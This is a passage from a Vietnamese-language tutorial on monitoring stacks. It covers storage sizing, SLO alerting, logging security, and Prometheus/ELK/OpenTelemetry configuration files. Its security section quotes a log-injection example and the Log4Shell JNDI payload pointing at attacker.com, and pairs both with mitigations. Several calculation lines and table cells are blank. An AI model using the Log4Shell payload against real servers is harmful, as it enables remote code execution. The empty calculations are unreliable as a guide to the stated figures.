  • Brendan Gregg, BPF Performance Tools (O’Reilly 2019) — bible của eBPF observability
  • Liz Rice, Learning eBPF (O’Reilly 2023) — beginner-friendly
  • Cilium documentation: https://docs.cilium.io/

2.12.6 Khi nào dùng eBPF vs Application Instrumentation?

Need business-level metrics (revenue, user_id, feature_flag)?
├─ YES → Application instrumentation (OpenTelemetry SDK)
└─ NO  → Need infrastructure/network visibility?
         ├─ YES → eBPF (Pixie, Cilium Hubble, Parca)
         └─ Both → Use complementary

Best practice 2024-2026 stack:

  1. OpenTelemetry SDK — application traces với business attributes
  2. Prometheus — infrastructure metrics (CPU, memory, network)
  3. eBPF observability (Pixie/Hubble) — kernel/network deep dive
  4. Continuous profiling (Parca/Pyroscope) — code-level performance
  5. Structured events backend (Honeycomb, ClickHouse) — high-cardinality drill-down

3. Estimation — Ước lượng Storage cho Monitoring Stack

3.1 Metrics Storage (TSDB Sizing)

Assumptions:

Thông sốGiá trị
Số services50
Metrics per service200 (avg, bao gồm custom + runtime + infra)
Unique label combinations per metric10 (avg)
Scrape interval15 giây
Bytes per sample16 bytes (timestamp 8B + value 8B)
Retention30 ngày
Compression ratio1.37 bytes/sample (sau compression, Prometheus real-world)

Tổng số time series:

Samples per day:

Storage per day (sau compression):

Storage cho 30 ngày retention:

Nhận xét: 100K series, 30 ngày retention → chỉ cần ~25GB. Prometheus single node hoàn toàn handle được. Nhưng nếu cardinality explosion lên 10M series → 2.3TB/30d → cần Thanos/Cortex/Mimir cho long-term storage.

3.2 Log Storage Sizing

Assumptions:

Thông sốGiá trị
Tổng QPS (tất cả services)10,000 req/s
Log lines per request5 (avg: access log, app log, DB query log, etc.)
Average log line size500 bytes (structured JSON)
Retention90 ngày
Elasticsearch index overhead10% (inverted index, doc values)

Log volume per day:

Sau Elasticsearch compression (~70% ratio, thực tế):

Storage cho 90 ngày retention:

Nhận xét: 10K QPS → cần ~64TB Elasticsearch storage cho 90 ngày. Đây là lý do:

  1. Log sampling cần thiết (không log 100% requests)
  2. Log levels quan trọng (production chỉ nên log WARN+ normally, DEBUG khi cần)
  3. Hot/Warm/Cold architecture trong Elasticsearch (SSD cho 7d, HDD cho 90d, S3 cho archive)
  4. Loki rẻ hơn vì không full-text index

3.3 Alert Threshold Calculation

Ví dụ: Tính threshold cho error rate alert dựa trên SLO

Assumptions:

  • SLO: 99.9% availability (30 ngày)
  • Error budget: 0.1% = 43.2 phút downtime / tháng

Burn rate thresholds:

AlertBurn RateError Rate ThresholdWindow
P114.4x5 phút
P26x30 phút
P31x6 giờ

Latency threshold calculation:

Nếu SLO: 99% requests < 200ms (P99 latency target):

Alert khi burn rate > 14.4x:

→ Alert khi hơn 14.4% requests chậm hơn 200ms trong window 5 phút.


4. Security — Bảo mật trong Monitoring & Logging

4.1 Log Injection Attacks

Mô tả: Attacker chèn malicious content vào input, input đó được log, và khi admin xem log trong Kibana/web UI → trigger XSS hoặc làm sai lệch log.

Ví dụ tấn công:

# Attacker gửi username:
username = "admin\n2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin"

# Trong plaintext log, dòng giả xuất hiện như log thật:
2024-01-15 10:30:45 ERROR Login failed user=admin
2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin  ← FAKE!

Log4Shell (CVE-2021-44228) — một trong những vulnerabilities nghiêm trọng nhất lịch sử:

# Attacker gửi header:
User-Agent: ${jndi:ldap://attacker.com/exploit}

# Log4j resolve JNDI lookup → download + execute malicious code
# → Remote Code Execution (RCE) trên server

Phòng chống:

Biện phápChi tiết
Structured loggingDùng JSON — field values được escape tự động, không thể inject newlines
Input sanitizationStrip control characters (\n, \r, \t) trước khi log
Parameterized logginglogger.info("Login failed", {"user": user_input}) thay vì logger.info(f"Login failed user={user_input}")
Update dependenciesLog4j >= 2.17.1, patch JNDI lookup
Output encodingKibana/Grafana Loki auto-escape HTML, nhưng custom dashboards cần encode

4.2 PII (Personally Identifiable Information) in Logs

Vấn đề: Logs chứa PII vi phạm GDPR, CCPA, PDPA (VN). Ví dụ:

{
  "message": "Payment processed",
  "user_email": "[email protected]",
  "credit_card": "4111-1111-1111-1111",
  "ip_address": "113.160.234.56",
  "phone": "+84901234567"
}

Giải pháp multi-layer:

LayerTechniqueVí dụ
ApplicationRedact/mask tại source codecredit_card: "****1111"
PipelineLogstash/Fluentd filtermutate { gsub => ["message", "\d{4}-\d{4}-\d{4}-\d{4}", "****REDACTED****"] }
StorageField-level encryption trong ESEncrypt user_email field
AccessRBAC trên KibanaChỉ Security team thấy full PII
RetentionAuto-delete PII sau 30 ngàyILM policy trong Elasticsearch

Logstash PII Filter Example:

filter {
  # Mask credit card numbers
  mutate {
    gsub => [
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]",
      "message", "\b\d{3}[-.]?\d{3}[-.]?\d{4}\b", "[PHONE_REDACTED]"
    ]
  }
 
  # Remove sensitive fields entirely
  mutate {
    remove_field => ["password", "secret", "token", "authorization"]
  }
}

4.3 Secure Log Transport

RiskMitigation
Eavesdropping (nghe lén log in transit)TLS 1.3 cho mọi log shipping (Filebeat → Logstash, Logstash → ES)
Tampering (sửa log)Digital signature / HMAC cho log entries; Append-only storage
Log forging (tạo log giả)Mutual TLS (mTLS) giữa log shipper và collector — chỉ trusted agents gửi log
Replay attackTimestamp + nonce trong log entries

Filebeat TLS config:

output.logstash:
  hosts: ["logstash.internal:5044"]
  ssl.enabled: true
  ssl.certificate_authorities: ["/etc/pki/ca.crt"]
  ssl.certificate: "/etc/pki/filebeat.crt"
  ssl.key: "/etc/pki/filebeat.key"
  ssl.verification_mode: "full"  # Verify server cert

4.4 Access Control for Monitoring Dashboards

Monitoring dashboards chứa thông tin cực kỳ nhạy cảm: architecture, traffic patterns, error details, internal endpoints. Nếu bị leak → attacker có blueprint của hệ thống.

ControlImplementation
AuthenticationSSO (SAML/OIDC) cho Grafana/Kibana — KHÔNG dùng default admin/admin
Authorization (RBAC)Grafana: Viewer/Editor/Admin per org. Kibana: Spaces + Roles
NetworkDashboard chỉ accessible qua VPN hoặc internal network
AuditLog mọi dashboard access, query execution, alert changes
Data maskingDashboard cho non-security team không hiển thị IP, user_id chi tiết

4.5 Audit Trail for Monitoring Changes

Mọi thay đổi trong monitoring system phải được audit:

ActionAudit Record
Alert rule created/modified/deletedWho, when, old value → new value
Dashboard modifiedGit-based provisioning (Grafana as Code)
Silence/inhibit createdWho silenced, duration, reason
Log retention policy changedApproval workflow required
Access granted to monitoringRBAC change log

Compliance requirement: SOC 2, PCI-DSS, HIPAA đều yêu cầu audit trail cho monitoring system changes. Nếu ai đó silence critical alert rồi thực hiện attack → audit trail là evidence.


5. DevOps — Full Monitoring Stack Setup

5.1 Prometheus + Grafana + Alertmanager Stack

docker-compose-monitoring.yml:

version: "3.8"
 
networks:
  monitoring:
    driver: bridge
 
volumes:
  prometheus_data: {}
  grafana_data: {}
  alertmanager_data: {}
 
services:
  # ============================================================
  # PROMETHEUS - Metrics Collection & Storage
  # ============================================================
  prometheus:
    image: prom/prometheus:v2.50.0
    container_name: prometheus
    restart: unless-stopped
    ports:
      - "9090:9090"
    volumes:
      - ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro
      - ./prometheus/alert-rules.yml:/etc/prometheus/alert-rules.yml:ro
      - prometheus_data:/prometheus
    command:
      - "--config.file=/etc/prometheus/prometheus.yml"
      - "--storage.tsdb.path=/prometheus"
      - "--storage.tsdb.retention.time=30d"
      - "--storage.tsdb.retention.size=50GB"
      - "--web.enable-lifecycle"          # Enable /-/reload endpoint
      - "--web.enable-admin-api"          # Enable admin API (careful in prod!)
      - "--storage.tsdb.min-block-duration=2h"
      - "--storage.tsdb.max-block-duration=2h"
    networks:
      - monitoring
    deploy:
      resources:
        limits:
          memory: 4G
          cpus: "2"
 
  # ============================================================
  # ALERTMANAGER - Alert Routing & Notification
  # ============================================================
  alertmanager:
    image: prom/alertmanager:v0.27.0
    container_name: alertmanager
    restart: unless-stopped
    ports:
      - "9093:9093"
    volumes:
      - ./alertmanager/alertmanager.yml:/etc/alertmanager/alertmanager.yml:ro
      - alertmanager_data:/alertmanager
    command:
      - "--config.file=/etc/alertmanager/alertmanager.yml"
      - "--storage.path=/alertmanager"
      - "--cluster.advertise-address=0.0.0.0:9093"
    networks:
      - monitoring
 
  # ============================================================
  # GRAFANA - Visualization & Dashboards
  # ============================================================
  grafana:
    image: grafana/grafana:10.3.0
    container_name: grafana
    restart: unless-stopped
    ports:
      - "3000:3000"
    environment:
      - GF_SECURITY_ADMIN_USER=admin
      - GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_ADMIN_PASSWORD:-changeme}
      - GF_USERS_ALLOW_SIGN_UP=false
      - GF_AUTH_ANONYMOUS_ENABLED=false
      - GF_SERVER_ROOT_URL=https://grafana.example.com
      - GF_SMTP_ENABLED=true
      - GF_SMTP_HOST=smtp.gmail.com:587
      - GF_LOG_LEVEL=warn
    volumes:
      - grafana_data:/var/lib/grafana
      - ./grafana/provisioning/datasources:/etc/grafana/provisioning/datasources:ro
      - ./grafana/provisioning/dashboards:/etc/grafana/provisioning/dashboards:ro
      - ./grafana/dashboards:/var/lib/grafana/dashboards:ro
    networks:
      - monitoring
 
  # ============================================================
  # NODE EXPORTER - Host Metrics (CPU, Memory, Disk, Network)
  # ============================================================
  node-exporter:
    image: prom/node-exporter:v1.7.0
    container_name: node-exporter
    restart: unless-stopped
    ports:
      - "9100:9100"
    volumes:
      - /proc:/host/proc:ro
      - /sys:/host/sys:ro
      - /:/rootfs:ro
    command:
      - "--path.procfs=/host/proc"
      - "--path.rootfs=/rootfs"
      - "--path.sysfs=/host/sys"
      - "--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)"
    networks:
      - monitoring
 
  # ============================================================
  # cADVISOR - Container Metrics
  # ============================================================
  cadvisor:
    image: gcr.io/cadvisor/cadvisor:v0.49.1
    container_name: cadvisor
    restart: unless-stopped
    ports:
      - "8080:8080"
    volumes:
      - /:/rootfs:ro
      - /var/run:/var/run:ro
      - /sys:/sys:ro
      - /var/lib/docker/:/var/lib/docker:ro
      - /dev/disk/:/dev/disk:ro
    privileged: true
    devices:
      - /dev/kmsg:/dev/kmsg
    networks:
      - monitoring

prometheus/prometheus.yml:

global:
  scrape_interval: 15s          # Default scrape interval
  evaluation_interval: 15s      # Rule evaluation interval
  scrape_timeout: 10s
 
# Alertmanager configuration
alerting:
  alertmanagers:
    - static_configs:
        - targets:
            - alertmanager:9093
 
# Load alert rules
rule_files:
  - "alert-rules.yml"
 
# Scrape targets
scrape_configs:
  # Prometheus self-monitoring
  - job_name: "prometheus"
    static_configs:
      - targets: ["localhost:9090"]
 
  # Node Exporter (host metrics)
  - job_name: "node-exporter"
    static_configs:
      - targets: ["node-exporter:9100"]
 
  # cAdvisor (container metrics)
  - job_name: "cadvisor"
    static_configs:
      - targets: ["cadvisor:8080"]
 
  # Application services (example)
  - job_name: "app-services"
    metrics_path: "/metrics"
    scrape_interval: 10s
    static_configs:
      - targets:
          - "api-gateway:8080"
          - "user-service:8081"
          - "payment-service:8082"
          - "order-service:8083"
        labels:
          env: "production"
 
  # Kubernetes service discovery (khi dùng k8s)
  # - job_name: "kubernetes-pods"
  #   kubernetes_sd_configs:
  #     - role: pod
  #   relabel_configs:
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
  #       action: keep
  #       regex: true
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
  #       action: replace
  #       target_label: __metrics_path__
  #       regex: (.+)

alertmanager/alertmanager.yml:

global:
  resolve_timeout: 5m
  smtp_from: "[email protected]"
  smtp_smarthost: "smtp.gmail.com:587"
  smtp_auth_username: "[email protected]"
  smtp_auth_password: "${SMTP_PASSWORD}"
  smtp_require_tls: true
 
# Notification templates
templates:
  - "/etc/alertmanager/templates/*.tmpl"
 
# Alert routing tree
route:
  receiver: "slack-default"
  group_by: ["alertname", "severity", "service"]
  group_wait: 30s           # Wait before sending first notification
  group_interval: 5m        # Wait between grouped notifications
  repeat_interval: 4h       # Repeat if not resolved
 
  routes:
    # P1 Critical → PagerDuty + Slack
    - match:
        severity: critical
      receiver: "pagerduty-critical"
      group_wait: 10s
      repeat_interval: 1h
      continue: true       # Also send to next matching route
 
    - match:
        severity: critical
      receiver: "slack-critical"
 
    # P2 High → Slack #incidents
    - match:
        severity: high
      receiver: "slack-incidents"
      repeat_interval: 2h
 
    # P3 Warning → Slack #alerts
    - match:
        severity: warning
      receiver: "slack-alerts"
      repeat_interval: 8h
 
    # Security alerts → Security team
    - match:
        category: security
      receiver: "security-team"
      group_wait: 0s
      repeat_interval: 30m
 
# Inhibition rules (suppress lower severity when higher fires)
inhibit_rules:
  - source_match:
      severity: "critical"
    target_match:
      severity: "warning"
    equal: ["alertname", "service"]
 
  - source_match:
      severity: "critical"
    target_match:
      severity: "high"
    equal: ["alertname", "service"]
 
# Receivers
receivers:
  - name: "slack-default"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_DEFAULT}"
        channel: "#monitoring"
        title: '[{{ .Status | toUpper }}] {{ .GroupLabels.alertname }}'
        text: '{{ range .Alerts }}*{{ .Annotations.summary }}*\n{{ .Annotations.description }}\n{{ end }}'
        send_resolved: true
 
  - name: "slack-critical"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_CRITICAL}"
        channel: "#incidents"
        title: '🚨 CRITICAL: {{ .GroupLabels.alertname }}'
        text: >-
          {{ range .Alerts }}
          *Service*: {{ .Labels.service }}
          *Summary*: {{ .Annotations.summary }}
          *Runbook*: {{ .Annotations.runbook_url }}
          {{ end }}
        send_resolved: true
 
  - name: "slack-incidents"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_INCIDENTS}"
        channel: "#incidents"
        send_resolved: true
 
  - name: "slack-alerts"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_ALERTS}"
        channel: "#alerts"
        send_resolved: true
 
  - name: "pagerduty-critical"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SERVICE_KEY}"
        severity: critical
        description: '{{ .GroupLabels.alertname }}: {{ .CommonAnnotations.summary }}'
        details:
          service: '{{ .GroupLabels.service }}'
          severity: '{{ .GroupLabels.severity }}'
          runbook: '{{ .CommonAnnotations.runbook_url }}'
 
  - name: "security-team"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_SECURITY}"
        channel: "#security-alerts"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SECURITY_KEY}"
        severity: critical

5.2 ELK Stack Docker Compose

docker-compose-elk.yml:

version: "3.8"
 
networks:
  elk:
    driver: bridge
 
volumes:
  elasticsearch_data: {}
  logstash_pipeline: {}
 
services:
  # ============================================================
  # ELASTICSEARCH - Log Storage & Search Engine
  # ============================================================
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:8.12.0
    container_name: elasticsearch
    restart: unless-stopped
    environment:
      - discovery.type=single-node
      - cluster.name=monitoring-cluster
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"
      - xpack.security.enabled=true
      - xpack.security.enrollment.enabled=true
      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-changeme}
      # ILM (Index Lifecycle Management) for log rotation
      - xpack.monitoring.collection.enabled=true
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - elasticsearch_data:/usr/share/elasticsearch/data
    ports:
      - "9200:9200"
    networks:
      - elk
    deploy:
      resources:
        limits:
          memory: 4G
 
  # ============================================================
  # LOGSTASH - Log Processing Pipeline
  # ============================================================
  logstash:
    image: docker.elastic.co/logstash/logstash:8.12.0
    container_name: logstash
    restart: unless-stopped
    volumes:
      - ./logstash/pipeline/logstash.conf:/usr/share/logstash/pipeline/logstash.conf:ro
      - ./logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
    ports:
      - "5044:5044"    # Beats input
      - "5000:5000"    # TCP input (for direct log shipping)
      - "9600:9600"    # Monitoring API
    environment:
      - "LS_JAVA_OPTS=-Xms1g -Xmx1g"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # KIBANA - Log Visualization
  # ============================================================
  kibana:
    image: docker.elastic.co/kibana/kibana:8.12.0
    container_name: kibana
    restart: unless-stopped
    environment:
      - ELASTICSEARCH_HOSTS=http://elasticsearch:9200
      - ELASTICSEARCH_USERNAME=kibana_system
      - ELASTICSEARCH_PASSWORD=${KIBANA_PASSWORD:-changeme}
      - xpack.security.enabled=true
      - xpack.encryptedSavedObjects.encryptionKey=${KIBANA_ENCRYPTION_KEY}
    ports:
      - "5601:5601"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # FILEBEAT - Log Shipper (chạy trên mỗi host)
  # ============================================================
  filebeat:
    image: docker.elastic.co/beats/filebeat:8.12.0
    container_name: filebeat
    restart: unless-stopped
    user: root
    volumes:
      - ./filebeat/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
      - /var/lib/docker/containers:/var/lib/docker/containers:ro
      - /var/log:/var/log:ro
    depends_on:
      - logstash
    networks:
      - elk

logstash/pipeline/logstash.conf:

input {
  beats {
    port => 5044
    ssl => true
    ssl_certificate_authorities => ["/etc/pki/ca.crt"]
    ssl_certificate => "/etc/pki/logstash.crt"
    ssl_key => "/etc/pki/logstash.key"
    ssl_verify_mode => "force_peer"
  }
 
  tcp {
    port => 5000
    codec => json_lines
  }
}
 
filter {
  # ============================
  # Parse JSON logs
  # ============================
  if [message] =~ /^\{/ {
    json {
      source => "message"
      target => "parsed"
    }
    mutate {
      rename => {
        "[parsed][level]" => "log_level"
        "[parsed][service]" => "service_name"
        "[parsed][trace_id]" => "trace_id"
        "[parsed][span_id]" => "span_id"
        "[parsed][duration_ms]" => "duration_ms"
      }
    }
  }
 
  # ============================
  # PII Redaction (CRITICAL!)
  # ============================
  mutate {
    gsub => [
      # Credit card numbers
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      # Email addresses
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", "[EMAIL_REDACTED]",
      # Vietnamese phone numbers
      "message", "\b(0|\+84)\d{9,10}\b", "[PHONE_REDACTED]",
      # SSN-like patterns
      "message", "\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]"
    ]
  }
 
  # Remove explicitly sensitive fields
  mutate {
    remove_field => ["password", "secret", "token", "authorization", "cookie",
                     "[parsed][password]", "[parsed][secret]", "[parsed][token]"]
  }
 
  # ============================
  # Enrich with geo data (optional)
  # ============================
  if [client_ip] {
    geoip {
      source => "client_ip"
      target => "geo"
    }
  }
 
  # ============================
  # Log injection protection
  # ============================
  mutate {
    gsub => [
      # Remove ANSI escape codes
      "message", "\e\[[0-9;]*m", "",
      # Remove null bytes
      "message", "\x00", ""
    ]
  }
 
  # ============================
  # Add metadata
  # ============================
  mutate {
    add_field => {
      "environment" => "${ENV:production}"
      "pipeline_version" => "2.0"
    }
  }
}
 
output {
  elasticsearch {
    hosts => ["elasticsearch:9200"]
    user => "elastic"
    password => "${ELASTIC_PASSWORD}"
    ssl => true
    index => "logs-%{[service_name]}-%{+YYYY.MM.dd}"
    ilm_enabled => true
    ilm_rollover_alias => "logs"
    ilm_policy => "logs-lifecycle"
  }
 
  # Debug output (disable in production)
  # stdout { codec => rubydebug }
}

5.3 OpenTelemetry Collector Configuration

otel-collector-config.yml:

receivers:
  # OTLP receiver (gRPC + HTTP)
  otlp:
    protocols:
      grpc:
        endpoint: 0.0.0.0:4317
      http:
        endpoint: 0.0.0.0:4318
        cors:
          allowed_origins: ["*"]
 
  # Prometheus receiver (scrape Prometheus-format metrics)
  prometheus:
    config:
      scrape_configs:
        - job_name: "otel-collector"
          scrape_interval: 15s
          static_configs:
            - targets: ["localhost:8888"]
 
  # Host metrics receiver
  hostmetrics:
    collection_interval: 30s
    scrapers:
      cpu: {}
      memory: {}
      disk: {}
      network: {}
      load: {}
 
processors:
  # Batch processor (buffer before export)
  batch:
    timeout: 5s
    send_batch_size: 1024
    send_batch_max_size: 2048
 
  # Memory limiter (prevent OOM)
  memory_limiter:
    check_interval: 1s
    limit_mib: 1024
    spike_limit_mib: 256
 
  # Attributes processor (add common attributes)
  attributes:
    actions:
      - key: environment
        value: "production"
        action: upsert
      - key: deployment.version
        value: "v2.1.0"
        action: upsert
 
  # Filter processor (drop noisy/unwanted telemetry)
  filter:
    error_mode: ignore
    traces:
      span:
        - 'attributes["http.target"] == "/health"'
        - 'attributes["http.target"] == "/metrics"'
        - 'attributes["http.target"] == "/readyz"'
 
  # Tail sampling (keep interesting traces, sample boring ones)
  tail_sampling:
    decision_wait: 10s
    num_traces: 50000
    expected_new_traces_per_sec: 1000
    policies:
      # Always keep error traces
      - name: errors-policy
        type: status_code
        status_code: {status_codes: [ERROR]}
      # Always keep slow traces (> 1s)
      - name: latency-policy
        type: latency
        latency: {threshold_ms: 1000}
      # Sample 10% of successful traces
      - name: probabilistic-policy
        type: probabilistic
        probabilistic: {sampling_percentage: 10}
 
exporters:
  # Export traces to Jaeger
  otlp/jaeger:
    endpoint: jaeger:4317
    tls:
      insecure: true
 
  # Export metrics to Prometheus
  prometheus:
    endpoint: 0.0.0.0:8889
    resource_to_telemetry_conversion:
      enabled: true
 
  # Export logs to Loki
  loki:
    endpoint: http://loki:3100/loki/api/v1/push
    default_labels_enabled:
      exporter: true
      job: true
 
  # Debug exporter (development only)
  # debug:
  #   verbosity: detailed
 
extensions:
  health_check:
    endpoint: 0.0.0.0:13133
  zpages:
    endpoint: 0.0.0.0:55679
 
service:
  extensions: [health_check, zpages]
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, filter, tail_sampling, batch, attributes]
      exporters: [otlp/jaeger]
    metrics:
      receivers: [otlp, prometheus, hostmetrics]
      processors: [memory_limiter, batch, attributes]
      exporters: [prometheus]
    logs:
      receivers: [otlp]
      processors: [memory_limiter, batch, attributes]
      exporters: [loki]
 
  telemetry:
    logs:
      level: info
    metrics:
      address: 0.0.0.0:8888

5.4 Grafana Dashboard Provisioning

grafana/provisioning/datasources/datasources.yml:

apiVersion: 1
datasources:
  - name: Prometheus
    type: prometheus
    access: proxy
    url: http://prometheus:9090
    isDefault: true
    editable: false
 
  - name: Elasticsearch
    type: elasticsearch
    access: proxy
    url: http://elasticsearch:9200
    database: "logs-*"
    basicAuth: true
    basicAuthUser: "grafana_reader"
    jsonData:
      timeField: "@timestamp"
      esVersion: "8.12.0"
      logMessageField: "message"
      logLevelField: "log_level"
 
  - name: Jaeger
    type: jaeger
    access: proxy
    url: http://jaeger:16686

grafana/provisioning/dashboards/dashboards.yml:

apiVersion: 1
providers:
  - name: "default"
    orgId: 1
    folder: "System Design Mastery"
    type: file
    disableDeletion: false
    editable: true
    options:
      path: /var/lib/grafana/dashboards
      foldersFromFilesStructure: true

Example Grafana Dashboard JSON (Golden Signals):

{
  "dashboard": {
    "title": "Golden Signals - Service Overview",
    "tags": ["golden-signals", "sre", "production"],
    "timezone": "browser",
    "refresh": "10s",
    "time": {"from": "now-1h", "to": "now"},
    "panels": [
      {
        "title": "Request Rate (Traffic)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total[5m]))",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "reqps",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 2800},
                {"color": "red", "value": 3500}
              ]
            }
          }
        }
      },
      {
        "title": "Error Rate (%)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total{status=~\"5..\"}[5m])) / sum by (service) (rate(http_requests_total[5m])) * 100",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.1},
                {"color": "red", "value": 1.0}
              ]
            }
          }
        }
      },
      {
        "title": "P99 Latency",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 8},
        "targets": [
          {
            "expr": "histogram_quantile(0.99, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p99"
          },
          {
            "expr": "histogram_quantile(0.50, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p50"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "s",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.2},
                {"color": "red", "value": 0.5}
              ]
            }
          }
        }
      },
      {
        "title": "Resource Saturation",
        "type": "gauge",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 8},
        "targets": [
          {
            "expr": "100 - (avg by (instance) (rate(node_cpu_seconds_total{mode=\"idle\"}[5m])) * 100)",
            "legendFormat": "CPU {{instance}}"
          },
          {
            "expr": "(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100",
            "legendFormat": "Memory {{instance}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "min": 0,
            "max": 100,
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 70},
                {"color": "red", "value": 90}
              ]
            }
          }
        }
      },
      {
        "title": "Error Budget Remaining",
        "type": "stat",
        "gridPos": {"h": 4, "w": 6, "x": 0, "y": 16},
        "targets": [
          {
            "expr": "1 - ((1 - (sum(rate(http_requests_total{status!~\"5..\"}[30d])) / sum(rate(http_requests_total[30d])))) / (1 - 0.999)) ",
            "legendFormat": "Error Budget"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percentunit",
            "thresholds": {
              "steps": [
                {"color": "red", "value": null},
                {"color": "yellow", "value": 0.25},
                {"color": "green", "value": 0.50}
              ]
            }
          }
        }
      }
    ]
  }
}

5.5 PagerDuty Integration Summary

┌──────────┐    ┌──────────────┐    ┌───────────┐    ┌──────────┐
│Prometheus │───►│ Alertmanager │───►│ PagerDuty │───►│ On-call  │
│ (fires   │    │ (routes,     │    │           │    │ Engineer │
│  alert)  │    │  groups,     │    │ - Phone   │    │          │
│          │    │  dedup)      │    │ - SMS     │    │ Ack /    │
│          │    │              │    │ - Push    │    │ Resolve  │
└──────────┘    └──────────────┘    │ - Email   │    └──────────┘
                                     │           │
                                     │ Escalation│
                                     │ Policy    │
                                     └───────────┘

Quy trình:

  1. Prometheus evaluates alert rule → fires alert
  2. Alertmanager receives, groups, deduplicates
  3. Alertmanager sends to PagerDuty via Events API v2
  4. PagerDuty creates incident → notifies on-call per escalation policy
  5. Engineer acknowledges → starts investigation
  6. Engineer resolves → PagerDuty updates status
  7. Alertmanager sends resolved → PagerDuty auto-resolves

6. Code — Instrumentation Examples

6.1 Python: Flask App with Prometheus Metrics + Structured Logging + OpenTelemetry

"""
Full observability instrumentation for a Python Flask service.
Includes: Prometheus metrics, structured logging, OpenTelemetry tracing.
"""
 
import time
import logging
import json
import sys
from datetime import datetime, timezone
 
from flask import Flask, request, g
from prometheus_client import (
    Counter, Histogram, Gauge, Info,
    generate_latest, CONTENT_TYPE_LATEST
)
from opentelemetry import trace
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.sdk.trace.export import BatchSpanProcessor
from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter
from opentelemetry.instrumentation.flask import FlaskInstrumentor
from opentelemetry.instrumentation.requests import RequestsInstrumentor
from opentelemetry.propagate import set_global_textmap
from opentelemetry.propagators.b3 import B3MultiFormat
from opentelemetry.sdk.resources import Resource
 
 
# ============================================================
# 1. STRUCTURED LOGGING SETUP
# ============================================================
 
class StructuredJsonFormatter(logging.Formatter):
    """
    Custom JSON formatter cho structured logging.
    Mọi log output đều là JSON — dễ parse bởi Logstash/Fluentd/Loki.
    """
    def format(self, record):
        log_entry = {
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "level": record.levelname,
            "logger": record.name,
            "message": record.getMessage(),
            "service": "payment-service",
            "instance": "payment-7b4f9d8c-x2k9p",
            "version": "2.1.0",
        }
 
        # Add trace context if available
        span = trace.get_current_span()
        if span and span.is_recording():
            ctx = span.get_span_context()
            log_entry["trace_id"] = format(ctx.trace_id, "032x")
            log_entry["span_id"] = format(ctx.span_id, "016x")
 
        # Add request context if available
        if hasattr(g, "request_id"):
            log_entry["request_id"] = g.request_id
 
        # Add extra fields
        if hasattr(record, "extra_fields"):
            log_entry.update(record.extra_fields)
 
        # Add exception info
        if record.exc_info and record.exc_info[0]:
            log_entry["exception"] = {
                "type": record.exc_info[0].__name__,
                "message": str(record.exc_info[1]),
                "traceback": self.formatException(record.exc_info),
            }
 
        return json.dumps(log_entry, default=str)
 
 
def setup_logging():
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(StructuredJsonFormatter())
 
    root_logger = logging.getLogger()
    root_logger.handlers.clear()
    root_logger.addHandler(handler)
    root_logger.setLevel(logging.INFO)
 
    return logging.getLogger("payment-service")
 
 
logger = setup_logging()
 
 
# ============================================================
# 2. OPENTELEMETRY TRACING SETUP
# ============================================================
 
def setup_tracing(app: Flask):
    resource = Resource.create({
        "service.name": "payment-service",
        "service.version": "2.1.0",
